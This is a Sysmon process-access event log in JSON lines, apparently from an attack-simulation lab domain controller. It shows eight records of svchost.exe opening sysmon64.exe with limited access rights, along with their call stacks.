{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1361,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.583\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.583","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1362,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.583\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.583","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1363,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.583\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.583","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1364,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.583\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.583","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1365,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.583\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.583","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1366,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.583\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.583","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1367,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.583\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.583","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1368,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.599\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.599","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
